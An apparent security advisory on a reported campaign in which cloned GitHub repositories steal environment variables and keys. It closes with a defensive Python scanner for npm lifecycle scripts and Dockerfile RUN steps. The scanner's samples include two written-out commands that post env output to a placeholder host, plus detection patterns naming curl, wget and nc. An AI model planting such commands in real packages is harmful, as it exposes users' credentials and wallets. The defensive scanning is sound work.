A recent report claims there is a widespread malware attack on GitHub that has affected over 35,000 code hits, including:
- Crypto
- GoLang
- Python
- JS
- Bash
- Docker
- K8s
The malware is reportedly added to npm scripts, Docker images and install docs. It is present in the install docs, so a user downloading the installation files for desktop or mobile from GitHub ends up downloading the infected file.
However, recent claims suggest that it is the attackers' own creation: it does not affect the original files created by the original author, but instead creates an alternative that can confuse users downloading files.
How it Works
When downloaded, this attack sends the ENTIRE ENV (environment variables) of the script, application and laptop (Electron apps) to the attacker's server. These ENVs include:
- Security Keys
- AWS access keys
- Crypto keys (including private keys and seed phrases).
The attacker creates fake organisations/repositories and pushes clones of legitimate projects to GitHub. A user who lands on GitHub then ends up downloading the clone rather than the original file, and the author gets the blame, not the hacker.
The attacker runs arbitrary code on your server once the file is downloaded and uploads your ENV.
Caution: Users are advised to always use the correct link from the originating author on GitHub before downloading any file.
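One way to check a freshly cloned repository before installing it is to look for commands in its npm lifecycle scripts and Dockerfile `RUN` steps that read the environment and contact the network on the same line. This is an added example, not code from the report; the matching heuristic, function names and sample contents are assumptions constructed for illustration.

```python
import json
import re

# Assumed heuristic (not from the report): flag a command that both reads the
# process environment and invokes a network client on the same line.
LIFECYCLE = {"preinstall", "install", "postinstall", "prepare"}
NET = re.compile(r"\b(curl|wget|nc|fetch|http\.request|requests\.post)\b")
ENV = re.compile(r"\$\(\s*(env|printenv)\b|`\s*(env|printenv)\b"
                 r"|\b(env|printenv)\s*\||process\.env\b|os\.environ\b")

def suspicious(cmd):
    """True when one command reads the environment and talks to the network."""
    return bool(NET.search(cmd) and ENV.search(cmd))

def scan_package_json(text):
    """Names of npm lifecycle scripts (run automatically on install) that match."""
    scripts = json.loads(text).get("scripts", {})
    return sorted(n for n, c in scripts.items() if n in LIFECYCLE and suspicious(c))

def scan_lines(text, prefix=""):
    """1-based numbers of matching lines; prefix="RUN" limits it to Dockerfile RUN steps."""
    return [i for i, line in enumerate(text.splitlines(), 1)
            if line.lstrip().upper().startswith(prefix) and suspicious(line)]

# Constructed samples; collector.invalid is a placeholder host.
SAMPLE_PACKAGE_JSON = json.dumps({"name": "demo", "scripts": {
    "test": "jest",
    "postinstall": 'curl -s -d "$(env)" https://collector.invalid/u',
}})
SAMPLE_DOCKERFILE = """FROM node:20
RUN npm ci
RUN printenv | curl -s --data-binary @- https://collector.invalid/u
ENV NODE_ENV=production
"""

if __name__ == "__main__":
    print("package.json:", scan_package_json(SAMPLE_PACKAGE_JSON))
    print("Dockerfile lines:", scan_lines(SAMPLE_DOCKERFILE, "RUN"))
```

A lifecycle script that calls a separate file (for example `node install.js`) is not covered, so that file needs the same inspection. Running `npm install --ignore-scripts` keeps lifecycle scripts from executing while you review.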